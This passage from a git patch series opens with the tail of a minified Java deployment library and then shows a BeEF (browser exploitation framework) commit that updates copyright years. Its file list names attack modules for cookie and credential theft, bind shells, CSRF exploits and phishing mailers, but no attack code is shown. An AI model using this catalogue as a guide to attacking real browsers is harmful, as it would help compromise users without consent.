Family"){p='<embed type="application/x-java-applet;jpi-version='+this.firefoxJavaVersion+'" width="0" height="0" launchjnlp="'+q+'"docbase="'+t+'" />'}}if(document.body=="undefined"||document.body==null){document.write(p);document.location=t}else{var r=document.createElement("div");r.id="div1";r.style.position="relative";r.style.left="-10000px";r.style.margin="0px auto";r.className="dynamicDiv";r.innerHTML=p;document.body.appendChild(r)}},createWebStartLaunchButtonEx:function(p,o){if(this.returnPage==null){this.returnPage=p}var n="javascript:deployJava.launchWebStartApplication('"+p+"');";document.write('<a href="'+n+'" onMouseOver="window.status=\'\'; return true;"><img src="'+this.launchButtonPNG+'" border="0" /></a>')},createWebStartLaunchButton:function(p,o){if(this.returnPage==null){this.returnPage=p}var n="javascript:if (!deployJava.isWebStartInstalled(&quot;"+o+"&quot;)) {if (deployJava.installLatestJRE()) {if (deployJava.launch(&quot;"+p+"&quot;)) {}}} else {if (deployJava.launch(&quot;"+p+"&quot;)) {}}";document.write('<a href="'+n+'" onMouseOver="window.status=\'\'; return true;"><img src="'+this.launchButtonPNG+'" border="0" /></a>')},launch:function(n){document.location=n;return true},isPluginInstalled:function(){var n=this.getPlugin();if(n&&n.jvms){return true}else{return false}},isAutoUpdateEnabled:function(){if(this.isPluginInstalled()){return this.getPlugin().isAutoUpdateEnabled()}return false},setAutoUpdateEnabled:function(){if(this.isPluginInstalled()){return this.getPlugin().setAutoUpdateEnabled()}return false},setInstallerType:function(n){this.installType=n;if(this.isPluginInstalled()){return this.getPlugin().setInstallerType(n)}return false},setAdditionalPackages:function(n){if(this.isPluginInstalled()){return this.getPlugin().setAdditionalPackages(n)}return false},setEarlyAccess:function(n){this.EAInstallEnabled=n},isPlugin2:function(){if(this.isPluginInstalled()){if(this.versionCheck("1.6.0_10+")){try{return this.getPlugin().isPlugin2()}catch(n){}}}return false},allowPlugin:function(){this.getBrowser();var n=("Safari"!=this.browserName2&&"Opera"!=this.browserName2);return n},getPlugin:function(){this.refresh();var n=null;if(this.allowPlugin()){n=document.getElementById("deployJavaPlugin")}return n},compareVersionToPattern:function(u,o,q,r){if(u==undefined||o==undefined){return false}var v="^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";var w=u.match(v);if(w!=null){var t=0;var x=new Array();for(var p=1;p<w.length;++p){if((typeof w[p]=="string")&&(w[p]!="")){x[t]=w[p];t++}}var n=Math.min(x.length,o.length);if(r){for(var p=0;p<n;++p){if(x[p]<o[p]){return false}else{if(x[p]>o[p]){return true}}}return true}else{for(var p=0;p<n;++p){if(x[p]!=o[p]){return false}}if(q){return true}else{return(x.length==o.length)}}}else{return false}},getBrowser:function(){if(this.browserName==null){var n=navigator.userAgent.toLowerCase();g("[getBrowser()] navigator.userAgent.toLowerCase() -> "+n);if((n.indexOf("msie")!=-1)&&(n.indexOf("opera")==-1)){this.browserName="MSIE";this.browserName2="MSIE"}else{if(n.indexOf("iphone")!=-1){this.browserName="Netscape Family";this.browserName2="iPhone"}else{if((n.indexOf("firefox")!=-1)&&(n.indexOf("opera")==-1)){this.browserName="Netscape Family";this.browserName2="Firefox"}else{if(n.indexOf("chrome")!=-1){this.browserName="Netscape Family";this.browserName2="Chrome"}else{if(n.indexOf("safari")!=-1){this.browserName="Netscape Family";this.browserName2="Safari"}else{if((n.indexOf("mozilla")!=-1)&&(n.indexOf("opera")==-1)){this.browserName="Netscape Family";this.browserName2="Other"}else{if(n.indexOf("opera")!=-1){this.browserName="Netscape Family";this.browserName2="Opera"}else{this.browserName="?";this.browserName2="unknown"}}}}}}}g("[getBrowser()] Detected browser name:"+this.browserName+", "+this.browserName2)}return this.browserName},testUsingActiveX:function(n){var p="JavaWebStart.isInstalled."+n+".0";if(typeof ActiveXObject=="undefined"||!ActiveXObject){g("[testUsingActiveX()] Browser claims to be IE, but no ActiveXObject object?");return false}try{return(new ActiveXObject(p)!=null)}catch(o){return false}},testForMSVM:function(){var o="{08B0E5C0-4FCB-11CF-AAA5-00401C608500}";if(typeof oClientCaps!="undefined"){var n=oClientCaps.getComponentVersion(o,"ComponentID");if((n=="")||(n=="5,0,5000,0")){return false}else{return true}}else{return false}},testUsingMimeTypes:function(o){if(!navigator.mimeTypes){g("[testUsingMimeTypes()] Browser claims to be Netscape family, but no mimeTypes[] array?");return false}for(var p=0;p<navigator.mimeTypes.length;++p){s=navigator.mimeTypes[p].type;var n=s.match(/^application\/x-java-applet\x3Bversion=(1\.8|1\.7|1\.6|1\.5|1\.4\.2)$/);if(n!=null){if(this.compareVersions(n[1],o)){return true}}}return false},testUsingPluginsArray:function(o){if((!navigator.plugins)||(!navigator.plugins.length)){return false}var n=navigator.platform.toLowerCase();for(var p=0;p<navigator.plugins.length;++p){s=navigator.plugins[p].description;if(s.search(/^Java Switchable Plug-in (Cocoa)/)!=-1){if(this.compareVersions("1.5.0",o)){return true}}else{if(s.search(/^Java/)!=-1){if(n.indexOf("win")!=-1){if(this.compareVersions("1.5.0",o)||this.compareVersions("1.6.0",o)){return true}}}}}if(this.compareVersions("1.5.0",o)){return true}return false},IEInstall:function(){location.href=this.getJavaURL+((this.returnPage!=null)?("&returnPage="+this.returnPage):"")+((this.locale!=null)?("&locale="+this.locale):"")+((this.brand!=null)?("&brand="+this.brand):"");return false},done:function(o,n){},FFInstall:function(){location.href=this.getJavaURL+((this.returnPage!=null)?("&returnPage="+this.returnPage):"")+((this.locale!=null)?("&locale="+this.locale):"")+((this.brand!=null)?("&brand="+this.brand):"")+((this.installType!=null)?("&type="+this.installType):"");return false},compareVersions:function(q,r){var o=q.split(".");var n=r.split(".");for(var p=0;p<o.length;++p){o[p]=Number(o[p])}for(var p=0;p<n.length;++p){n[p]=Number(n[p])}if(o.length==2){o[2]=0}if(o[0]>n[0]){return true}if(o[0]<n[0]){return false}if(o[1]>n[1]){return true}if(o[1]<n[1]){return false}if(o[2]>n[2]){return true}if(o[2]<n[2]){return false}return true},enableAlerts:function(){this.browserName=null;this.debug=true},poll:function(){this.refresh();var n=this.getJREs();if((this.preInstallJREList.length==0)&&(n.length!=0)){clearInterval(this.myInterval);if(this.returnPage!=null){location.href=this.returnPage}}if((this.preInstallJREList.length!=0)&&(n.length!=0)&&(this.preInstallJREList[0]!=n[0])){clearInterval(this.myInterval);if(this.returnPage!=null){location.href=this.returnPage}}},writePluginTag:function(){var n=this.getBrowser();if(n=="MSIE"){document.write('<object classid="clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA" id="deployJavaPlugin" width="0" height="0"></object>')}else{if(n=="Netscape Family"&&this.allowPlugin()){this.writeEmbedTag()}}},refresh:function(){navigator.plugins.refresh(false);var n=this.getBrowser();if(n=="Netscape Family"&&this.allowPlugin()){var o=document.getElementById("deployJavaPlugin");if(o==null){this.writeEmbedTag()}}},writeEmbedTag:function(){var n=false;if(navigator.mimeTypes!=null){for(var o=0;o<navigator.mimeTypes.length;o++){if(navigator.mimeTypes[o].type==this.mimeType){if(navigator.mimeTypes[o].enabledPlugin){document.write('<embed id="deployJavaPlugin" type="'+this.mimeType+'" hidden="true" />');n=true}}}if(!n){for(var o=0;o<navigator.mimeTypes.length;o++){if(navigator.mimeTypes[o].type==this.oldMimeType){if(navigator.mimeTypes[o].enabledPlugin){document.write('<embed id="deployJavaPlugin" type="'+this.oldMimeType+'" hidden="true" />')}}}}}}};d.writePluginTag();if(d.locale==null){var h=null;if(h==null){try{h=navigator.userLanguage}catch(f){}}if(h==null){try{h=navigator.systemLanguage}catch(f){}}if(h==null){try{h=navigator.language}catch(f){}}if(h!=null){h.replace("-","_");d.locale=h}}return d}();
+
+        versionJRE = deployJava.getJREs();
+
+        if(versionJRE != '')
+            return true;
+        else
+            return false;
 	},
 
 	/**

From fe400384415892a926cd8c318c13ad05d1a52f73 Mon Sep 17 00:00:00 2001
From: Wade Alcorn <wade@bindshell.net>
Date: Sun, 30 Dec 2012 12:47:40 +1000
Subject: [PATCH 124/397] Updated copyright year to 2013

---
 BeEFLive.sh                                                   | 4 ++--
 Gemfile                                                       | 2 +-
 INSTALL.txt                                                   | 2 +-
 README                                                        | 2 +-
 README.mkd                                                    | 2 +-
 Rakefile                                                      | 2 +-
 VERSION                                                       | 2 +-
 beef                                                          | 2 +-
 config.yaml                                                   | 2 +-
 core/api.rb                                                   | 2 +-
 core/api/extension.rb                                         | 2 +-
 core/api/extensions.rb                                        | 2 +-
 core/api/main/configuration.rb                                | 2 +-
 core/api/main/migration.rb                                    | 2 +-
 core/api/main/network_stack/assethandler.rb                   | 2 +-
 core/api/main/server.rb                                       | 2 +-
 core/api/main/server/hook.rb                                  | 2 +-
 core/api/module.rb                                            | 2 +-
 core/api/modules.rb                                           | 2 +-
 core/bootstrap.rb                                             | 2 +-
 core/core.rb                                                  | 2 +-
 core/extension.rb                                             | 2 +-
 core/extensions.rb                                            | 2 +-
 core/filters.rb                                               | 2 +-
 core/filters/base.rb                                          | 2 +-
 core/filters/browser.rb                                       | 2 +-
 core/filters/command.rb                                       | 2 +-
 core/filters/http.rb                                          | 2 +-
 core/filters/page.rb                                          | 2 +-
 core/hbmanager.rb                                             | 2 +-
 core/loader.rb                                                | 2 +-
 core/main/client/are.js                                       | 2 +-
 core/main/client/beef.js                                      | 2 +-
 core/main/client/browser.js                                   | 2 +-
 core/main/client/browser/cookie.js                            | 2 +-
 core/main/client/browser/popup.js                             | 2 +-
 core/main/client/dom.js                                       | 2 +-
 core/main/client/encode/base64.js                             | 2 +-
 core/main/client/encode/json.js                               | 2 +-
 core/main/client/geolocation.js                               | 2 +-
 core/main/client/hardware.js                                  | 2 +-
 core/main/client/init.js                                      | 2 +-
 core/main/client/lib/evercookie.js                            | 2 +-
 core/main/client/logger.js                                    | 2 +-
 core/main/client/mitb.js                                      | 2 +-
 core/main/client/net.js                                       | 2 +-
 core/main/client/net/dns.js                                   | 2 +-
 core/main/client/net/local.js                                 | 2 +-
 core/main/client/net/portscanner.js                           | 2 +-
 core/main/client/net/requester.js                             | 2 +-
 core/main/client/os.js                                        | 2 +-
 core/main/client/session.js                                   | 2 +-
 core/main/client/timeout.js                                   | 2 +-
 core/main/client/updater.js                                   | 2 +-
 core/main/client/websocket.js                                 | 2 +-
 core/main/command.rb                                          | 2 +-
 core/main/configuration.rb                                    | 2 +-
 core/main/console/banners.rb                                  | 2 +-
 core/main/console/commandline.rb                              | 2 +-
 core/main/constants/browsers.rb                               | 2 +-
 core/main/constants/commandmodule.rb                          | 2 +-
 core/main/constants/distributedengine.rb                      | 2 +-
 core/main/constants/hardware.rb                               | 2 +-
 core/main/constants/os.rb                                     | 2 +-
 core/main/crypto.rb                                           | 2 +-
 core/main/distributed_engine/models/rules.rb                  | 2 +-
 core/main/handlers/browserdetails.rb                          | 2 +-
 core/main/handlers/commands.rb                                | 2 +-
 core/main/handlers/hookedbrowsers.rb                          | 2 +-
 core/main/handlers/modules/beefjs.rb                          | 2 +-
 core/main/handlers/modules/command.rb                         | 4 ++--
 core/main/logger.rb                                           | 2 +-
 core/main/migration.rb                                        | 2 +-
 core/main/models/browserdetails.rb                            | 2 +-
 core/main/models/command.rb                                   | 2 +-
 core/main/models/commandmodule.rb                             | 2 +-
 core/main/models/hookedbrowser.rb                             | 2 +-
 core/main/models/log.rb                                       | 2 +-
 core/main/models/optioncache.rb                               | 2 +-
 core/main/models/result.rb                                    | 2 +-
 core/main/models/user.rb                                      | 2 +-
 core/main/network_stack/api.rb                                | 2 +-
 core/main/network_stack/assethandler.rb                       | 2 +-
 core/main/network_stack/handlers/dynamicreconstruction.rb     | 2 +-
 core/main/network_stack/websocket/websocket.rb                | 2 +-
 core/main/rest/api.rb                                         | 2 +-
 core/main/rest/handlers/admin.rb                              | 2 +-
 core/main/rest/handlers/categories.rb                         | 2 +-
 core/main/rest/handlers/hookedbrowsers.rb                     | 2 +-
 core/main/rest/handlers/logs.rb                               | 2 +-
 core/main/rest/handlers/modules.rb                            | 2 +-
 core/main/router/api.rb                                       | 2 +-
 core/main/router/router.rb                                    | 2 +-
 core/main/server.rb                                           | 2 +-
 core/module.rb                                                | 2 +-
 core/modules.rb                                               | 2 +-
 core/ruby.rb                                                  | 2 +-
 core/ruby/hash.rb                                             | 2 +-
 core/ruby/module.rb                                           | 2 +-
 core/ruby/object.rb                                           | 2 +-
 core/ruby/patches/dm-do-adapter/adapter.rb                    | 2 +-
 core/ruby/print.rb                                            | 2 +-
 core/ruby/security.rb                                         | 2 +-
 core/ruby/string.rb                                           | 2 +-
 core/settings.rb                                              | 2 +-
 docs/COPYING                                                  | 2 +-
 docs/boilerplate                                              | 2 +-
 extensions/admin_ui/api/command.rb                            | 2 +-
 extensions/admin_ui/api/handler.rb                            | 2 +-
 extensions/admin_ui/classes/httpcontroller.rb                 | 2 +-
 extensions/admin_ui/classes/session.rb                        | 2 +-
 extensions/admin_ui/config.yaml                               | 2 +-
 extensions/admin_ui/constants/agents.rb                       | 2 +-
 extensions/admin_ui/constants/icons.rb                        | 2 +-
 .../admin_ui/controllers/authentication/authentication.rb     | 2 +-
 extensions/admin_ui/controllers/authentication/index.html     | 2 +-
 extensions/admin_ui/controllers/logs/logs.rb                  | 2 +-
 extensions/admin_ui/controllers/modules/modules.rb            | 2 +-
 extensions/admin_ui/controllers/panel/index.html              | 2 +-
 extensions/admin_ui/controllers/panel/panel.rb                | 2 +-
 extensions/admin_ui/extension.rb                              | 2 +-
 extensions/admin_ui/handlers/ui.rb                            | 2 +-
 extensions/admin_ui/media/css/base.css                        | 2 +-
 extensions/admin_ui/media/css/ext-all.css                     | 2 +-
 extensions/admin_ui/media/css/wterm.css                       | 2 +-
 extensions/admin_ui/media/javascript/esapi/Class.create.js    | 2 +-
 extensions/admin_ui/media/javascript/ext-beef.js              | 2 +-
 extensions/admin_ui/media/javascript/ui/authentication.js     | 2 +-
 extensions/admin_ui/media/javascript/ui/panel/DataGrid.js     | 2 +-
 .../admin_ui/media/javascript/ui/panel/DistributedEngine.js   | 2 +-
 .../admin_ui/media/javascript/ui/panel/HackVertorTab.js       | 2 +-
 extensions/admin_ui/media/javascript/ui/panel/HooksTab.js     | 2 +-
 extensions/admin_ui/media/javascript/ui/panel/Logout.js       | 2 +-
 extensions/admin_ui/media/javascript/ui/panel/MainPanel.js    | 2 +-
 .../admin_ui/media/javascript/ui/panel/PanelStatusBar.js      | 2 +-
 extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js  | 2 +-
 extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js   | 2 +-
 extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js    | 2 +-
 extensions/admin_ui/media/javascript/ui/panel/ZombieTabs.js   | 2 +-
 extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js   | 2 +-
 extensions/admin_ui/media/javascript/ui/panel/common.js       | 2 +-
 .../media/javascript/ui/panel/tabs/ZombieTabCommands.js       | 2 +-
 .../media/javascript/ui/panel/tabs/ZombieTabDetails.js        | 2 +-
 .../admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js  | 2 +-
 .../admin_ui/media/javascript/ui/panel/tabs/ZombieTabLogs.js  | 2 +-
 .../admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js | 2 +-
 .../media/javascript/ui/panel/tabs/ZombieTabXssRays.js        | 2 +-
 .../admin_ui/media/javascript/ui/panel/zombiesTreeList.js     | 2 +-
 extensions/admin_ui/media/javascript/ux/PagingStore.js        | 2 +-
 extensions/admin_ui/media/javascript/ux/StatusBar.js          | 2 +-
 extensions/admin_ui/media/javascript/ux/TabCloseMenu.js       | 2 +-
 extensions/admin_ui/media/javascript/wterm/wterm.jquery.js    | 2 +-
 extensions/autoloader/config.yaml                             | 2 +-
 extensions/autoloader/extension.rb                            | 2 +-
 extensions/autoloader/model.rb                                | 2 +-
 extensions/console/config.yaml                                | 2 +-
 extensions/console/extension.rb                               | 2 +-
 extensions/console/lib/command_dispatcher.rb                  | 2 +-
 extensions/console/lib/command_dispatcher/command.rb          | 2 +-
 extensions/console/lib/command_dispatcher/core.rb             | 2 +-
 extensions/console/lib/command_dispatcher/target.rb           | 2 +-
 extensions/console/lib/shellinterface.rb                      | 2 +-
 extensions/console/shell.rb                                   | 2 +-
 extensions/customhook/api.rb                                  | 2 +-
 extensions/customhook/config.yaml                             | 2 +-
 extensions/customhook/extension.rb                            | 2 +-
 extensions/customhook/handler.rb                              | 2 +-
 extensions/customhook/html/index.html                         | 2 +-
 extensions/demos/api.rb                                       | 2 +-
 extensions/demos/chrome_extension/index.html                  | 2 +-
 extensions/demos/chrome_extension/persistent_tab.html         | 2 +-
 extensions/demos/config.yaml                                  | 2 +-
 extensions/demos/extension.rb                                 | 2 +-
 extensions/demos/flash_update_chrome_extension/background.js  | 2 +-
 extensions/demos/html/basic.html                              | 2 +-
 extensions/demos/html/butcher/butch.css                       | 2 +-
 extensions/demos/html/butcher/index.html                      | 2 +-
 extensions/demos/html/butcher/jquery-1.5.min.js               | 2 +-
 extensions/demos/html/butcher/secret_page.html                | 2 +-
 extensions/demos/html/checkJava.java                          | 2 +-
 extensions/demos/html/clickjacking/clickjack_attack.html      | 2 +-
 extensions/demos/html/clickjacking/clickjack_victim.html      | 2 +-
 extensions/demos/html/plain.html                              | 2 +-
 extensions/demos/html/report.html                             | 2 +-
 extensions/demos/html/secret_page.html                        | 2 +-
 extensions/evasion/config.yaml                                | 2 +-
 extensions/evasion/evasion.rb                                 | 2 +-
 extensions/evasion/extension.rb                               | 2 +-
 extensions/evasion/helper.rb                                  | 2 +-
 extensions/evasion/obfuscation/base_64.rb                     | 2 +-
 extensions/evasion/obfuscation/minify.rb                      | 2 +-
 extensions/evasion/obfuscation/scramble.rb                    | 2 +-
 extensions/evasion/obfuscation/whitespace.rb                  | 2 +-
 extensions/events/api.rb                                      | 2 +-
 extensions/events/config.yaml                                 | 2 +-
 extensions/events/extension.rb                                | 2 +-
 extensions/events/handler.rb                                  | 2 +-
 extensions/ipec/config.yaml                                   | 2 +-
 extensions/ipec/extension.rb                                  | 2 +-
 .../files/LinkTargetFinder/chrome/content/linkTargetFinder.js | 2 +-
 .../ipec/files/LinkTargetFinder/defaults/preferences/prefs.js | 2 +-
 extensions/ipec/files/LinkTargetFinder/skin/skin.css          | 2 +-
 extensions/ipec/junk_calculator.rb                            | 2 +-
 extensions/ipec/models/ipec_exploits.rb                       | 2 +-
 extensions/ipec/models/ipec_exploits_run.rb                   | 2 +-
 extensions/ipec/rest/ipec.rb                                  | 2 +-
 extensions/metasploit/api.rb                                  | 2 +-
 extensions/metasploit/config.yaml                             | 2 +-
 extensions/metasploit/extension.rb                            | 2 +-
 extensions/metasploit/module.rb                               | 2 +-
 extensions/metasploit/rpcclient.rb                            | 2 +-
 extensions/notifications/channels/email.rb                    | 2 +-
 extensions/notifications/channels/tweet.rb                    | 2 +-
 extensions/notifications/config.yaml                          | 2 +-
 extensions/notifications/extension.rb                         | 2 +-
 extensions/notifications/notifications.rb                     | 2 +-
 extensions/proxy/api.rb                                       | 2 +-
 extensions/proxy/config.yaml                                  | 2 +-
 extensions/proxy/controllers/proxy.rb                         | 2 +-
 extensions/proxy/extension.rb                                 | 2 +-
 extensions/proxy/proxy.rb                                     | 2 +-
 extensions/qrcode/config.yaml                                 | 2 +-
 extensions/qrcode/extension.rb                                | 2 +-
 extensions/qrcode/qrcode.rb                                   | 2 +-
 extensions/requester/api.rb                                   | 2 +-
 extensions/requester/api/hook.rb                              | 4 ++--
 extensions/requester/config.yaml                              | 2 +-
 extensions/requester/controllers/requester.rb                 | 2 +-
 extensions/requester/extension.rb                             | 2 +-
 extensions/requester/handler.rb                               | 2 +-
 extensions/requester/models/http.rb                           | 2 +-
 extensions/social_engineering/config.yaml                     | 2 +-
 extensions/social_engineering/extension.rb                    | 2 +-
 extensions/social_engineering/mass_mailer/mass_mailer.rb      | 2 +-
 .../mass_mailer/templates/default/mail.html                   | 2 +-
 .../mass_mailer/templates/edfenergy/mail.html                 | 2 +-
 extensions/social_engineering/models/interceptor.rb           | 2 +-
 extensions/social_engineering/models/mass_mailer.rb           | 2 +-
 extensions/social_engineering/models/web_cloner.rb            | 2 +-
 extensions/social_engineering/rest/socialengineering.rb       | 2 +-
 extensions/social_engineering/web_cloner/interceptor.rb       | 2 +-
 extensions/social_engineering/web_cloner/web_cloner.rb        | 2 +-
 extensions/xssrays/api.rb                                     | 2 +-
 extensions/xssrays/api/scan.rb                                | 4 ++--
 extensions/xssrays/config.yaml                                | 2 +-
 extensions/xssrays/controllers/xssrays.rb                     | 2 +-
 extensions/xssrays/extension.rb                               | 2 +-
 extensions/xssrays/handler.rb                                 | 2 +-
 extensions/xssrays/models/xssraysdetail.rb                    | 2 +-
 extensions/xssrays/models/xssraysscan.rb                      | 2 +-
 install                                                       | 2 +-
 install-beef                                                  | 2 +-
 modules/browser/browser_fingerprinting/command.js             | 2 +-
 modules/browser/browser_fingerprinting/config.yaml            | 2 +-
 modules/browser/browser_fingerprinting/module.rb              | 2 +-
 modules/browser/detect_default_browser/command.js             | 2 +-
 modules/browser/detect_default_browser/config.yaml            | 2 +-
 modules/browser/detect_default_browser/module.rb              | 2 +-
 modules/browser/detect_firebug/command.js                     | 2 +-
 modules/browser/detect_firebug/config.yaml                    | 2 +-
 modules/browser/detect_firebug/module.rb                      | 2 +-
 modules/browser/detect_popup_blocker/command.js               | 2 +-
 modules/browser/detect_popup_blocker/config.yaml              | 2 +-
 modules/browser/detect_popup_blocker/module.rb                | 2 +-
 modules/browser/detect_unsafe_activex/command.js              | 2 +-
 modules/browser/detect_unsafe_activex/config.yaml             | 2 +-
 modules/browser/detect_unsafe_activex/module.rb               | 2 +-
 modules/browser/get_visited_domains/command.js                | 2 +-
 modules/browser/get_visited_domains/config.yaml               | 2 +-
 modules/browser/get_visited_domains/module.rb                 | 2 +-
 modules/browser/get_visited_urls/command.js                   | 2 +-
 modules/browser/get_visited_urls/config.yaml                  | 2 +-
 modules/browser/get_visited_urls/module.rb                    | 2 +-
 modules/browser/hooked_domain/ajax_fingerprint/command.js     | 2 +-
 modules/browser/hooked_domain/ajax_fingerprint/config.yaml    | 2 +-
 modules/browser/hooked_domain/ajax_fingerprint/module.rb      | 2 +-
 modules/browser/hooked_domain/alert_dialog/command.js         | 2 +-
 modules/browser/hooked_domain/alert_dialog/config.yaml        | 2 +-
 modules/browser/hooked_domain/alert_dialog/module.rb          | 2 +-
 modules/browser/hooked_domain/deface_web_page/command.js      | 2 +-
 modules/browser/hooked_domain/deface_web_page/config.yaml     | 2 +-
 modules/browser/hooked_domain/deface_web_page/module.rb       | 2 +-
 modules/browser/hooked_domain/get_cookie/command.js           | 2 +-
 modules/browser/hooked_domain/get_cookie/config.yaml          | 2 +-
 modules/browser/hooked_domain/get_cookie/module.rb            | 2 +-
 modules/browser/hooked_domain/get_local_storage/command.js    | 2 +-
 modules/browser/hooked_domain/get_local_storage/config.yaml   | 2 +-
 modules/browser/hooked_domain/get_local_storage/module.rb     | 2 +-
 modules/browser/hooked_domain/get_page_html/command.js        | 2 +-
 modules/browser/hooked_domain/get_page_html/config.yaml       | 2 +-
 modules/browser/hooked_domain/get_page_html/module.rb         | 2 +-
 modules/browser/hooked_domain/get_page_links/command.js       | 2 +-
 modules/browser/hooked_domain/get_page_links/config.yaml      | 2 +-
 modules/browser/hooked_domain/get_page_links/module.rb        | 2 +-
 modules/browser/hooked_domain/get_session_storage/command.js  | 2 +-
 modules/browser/hooked_domain/get_session_storage/config.yaml | 2 +-
 modules/browser/hooked_domain/get_session_storage/module.rb   | 2 +-
 .../browser/hooked_domain/get_stored_credentials/command.js   | 2 +-
 .../browser/hooked_domain/get_stored_credentials/config.yaml  | 2 +-
 .../browser/hooked_domain/get_stored_credentials/module.rb    | 2 +-
 modules/browser/hooked_domain/link_rewrite/command.js         | 2 +-
 modules/browser/hooked_domain/link_rewrite/config.yaml        | 2 +-
 modules/browser/hooked_domain/link_rewrite/module.rb          | 2 +-
 .../browser/hooked_domain/link_rewrite_sslstrip/command.js    | 2 +-
 .../browser/hooked_domain/link_rewrite_sslstrip/config.yaml   | 2 +-
 modules/browser/hooked_domain/link_rewrite_sslstrip/module.rb | 2 +-
 modules/browser/hooked_domain/link_rewrite_tel/command.js     | 2 +-
 modules/browser/hooked_domain/link_rewrite_tel/config.yaml    | 2 +-
 modules/browser/hooked_domain/link_rewrite_tel/module.rb      | 2 +-
 .../hooked_domain/mobilesafari_address_spoofing/command.js    | 2 +-
 .../hooked_domain/mobilesafari_address_spoofing/config.yaml   | 2 +-
 .../hooked_domain/mobilesafari_address_spoofing/module.rb     | 2 +-
 modules/browser/hooked_domain/prompt_dialog/command.js        | 2 +-
 modules/browser/hooked_domain/prompt_dialog/config.yaml       | 2 +-
 modules/browser/hooked_domain/prompt_dialog/module.rb         | 2 +-
 modules/browser/hooked_domain/replace_video/command.js        | 2 +-
 modules/browser/hooked_domain/replace_video/config.yaml       | 2 +-
 modules/browser/hooked_domain/replace_video/module.rb         | 2 +-
 modules/browser/hooked_domain/rickroll/command.js             | 2 +-
 modules/browser/hooked_domain/rickroll/config.yaml            | 2 +-
 modules/browser/hooked_domain/rickroll/module.rb              | 2 +-
 modules/browser/hooked_domain/site_redirect/command.js        | 2 +-
 modules/browser/hooked_domain/site_redirect/config.yaml       | 2 +-
 modules/browser/hooked_domain/site_redirect/module.rb         | 2 +-
 modules/browser/hooked_domain/site_redirect_iframe/command.js | 2 +-
 .../browser/hooked_domain/site_redirect_iframe/config.yaml    | 2 +-
 modules/browser/hooked_domain/site_redirect_iframe/module.rb  | 2 +-
 modules/browser/play_sound/command.js                         | 2 +-
 modules/browser/play_sound/config.yaml                        | 2 +-
 modules/browser/play_sound/module.rb                          | 2 +-
 modules/browser/unhook/command.js                             | 2 +-
 modules/browser/unhook/config.yaml                            | 2 +-
 modules/browser/unhook/module.rb                              | 2 +-
 modules/browser/webcam/command.js                             | 2 +-
 modules/browser/webcam/config.yaml                            | 2 +-
 modules/browser/webcam/module.rb                              | 2 +-
 modules/chrome_extensions/execute_tabs/command.js             | 2 +-
 modules/chrome_extensions/execute_tabs/config.yaml            | 2 +-
 modules/chrome_extensions/execute_tabs/module.rb              | 2 +-
 modules/chrome_extensions/get_all_cookies/command.js          | 2 +-
 modules/chrome_extensions/get_all_cookies/config.yaml         | 2 +-
 modules/chrome_extensions/get_all_cookies/module.rb           | 2 +-
 modules/chrome_extensions/get_chrome_extensions/command.js    | 2 +-
 modules/chrome_extensions/get_chrome_extensions/config.yaml   | 2 +-
 modules/chrome_extensions/get_chrome_extensions/module.rb     | 2 +-
 modules/chrome_extensions/grab_google_contacts/command.js     | 2 +-
 modules/chrome_extensions/grab_google_contacts/config.yaml    | 2 +-
 modules/chrome_extensions/grab_google_contacts/module.rb      | 2 +-
 modules/chrome_extensions/inject_beef/command.js              | 2 +-
 modules/chrome_extensions/inject_beef/config.yaml             | 2 +-
 modules/chrome_extensions/inject_beef/module.rb               | 2 +-
 modules/chrome_extensions/screenshot/command.js               | 2 +-
 modules/chrome_extensions/screenshot/config.yaml              | 2 +-
 modules/chrome_extensions/screenshot/module.rb                | 2 +-
 modules/chrome_extensions/send_gvoice_sms/command.js          | 2 +-
 modules/chrome_extensions/send_gvoice_sms/config.yaml         | 2 +-
 modules/chrome_extensions/send_gvoice_sms/module.rb           | 2 +-
 modules/debug/test_cors_request/command.js                    | 2 +-
 modules/debug/test_cors_request/config.yaml                   | 2 +-
 modules/debug/test_cors_request/module.rb                     | 2 +-
 modules/debug/test_network_request/command.js                 | 2 +-
 modules/debug/test_network_request/config.yaml                | 2 +-
 modules/debug/test_network_request/module.rb                  | 2 +-
 modules/debug/test_return_ascii_chars/command.js              | 2 +-
 modules/debug/test_return_ascii_chars/config.yaml             | 2 +-
 modules/debug/test_return_ascii_chars/module.rb               | 2 +-
 modules/debug/test_return_long_string/command.js              | 2 +-
 modules/debug/test_return_long_string/config.yaml             | 2 +-
 modules/debug/test_return_long_string/module.rb               | 2 +-
 modules/exploits/axous_1_1_1_add_user_csrf/command.js         | 2 +-
 modules/exploits/axous_1_1_1_add_user_csrf/config.yaml        | 2 +-
 modules/exploits/axous_1_1_1_add_user_csrf/module.rb          | 2 +-
 modules/exploits/beefbind/beef_bind_shell/command.js          | 2 +-
 modules/exploits/beefbind/beef_bind_shell/config.yaml         | 2 +-
 modules/exploits/beefbind/beef_bind_shell/module.rb           | 2 +-
 modules/exploits/beefbind/beef_bind_staged_deploy/command.js  | 2 +-
 modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml | 2 +-
 modules/exploits/beefbind/beef_bind_staged_deploy/module.rb   | 2 +-
 modules/exploits/boastmachine_3_1_add_user_csrf/command.js    | 2 +-
 modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml   | 2 +-
 modules/exploits/boastmachine_3_1_add_user_csrf/module.rb     | 2 +-
 modules/exploits/camera/dlink_dcs_series_csrf/command.js      | 2 +-
 modules/exploits/camera/dlink_dcs_series_csrf/config.yaml     | 2 +-
 modules/exploits/camera/dlink_dcs_series_csrf/module.rb       | 2 +-
 .../camera/linksys_wvc_wireless_camera_csrf/command.js        | 2 +-
 .../camera/linksys_wvc_wireless_camera_csrf/config.yaml       | 2 +-
 .../camera/linksys_wvc_wireless_camera_csrf/module.rb         | 2 +-
 modules/exploits/coldfusion_dir_traversal_exploit/command.js  | 2 +-
 modules/exploits/coldfusion_dir_traversal_exploit/config.yaml | 2 +-
 modules/exploits/coldfusion_dir_traversal_exploit/module.rb   | 2 +-
 modules/exploits/glassfish_war_upload_xsrf/command.js         | 2 +-
 modules/exploits/glassfish_war_upload_xsrf/config.yaml        | 2 +-
 modules/exploits/glassfish_war_upload_xsrf/module.rb          | 2 +-
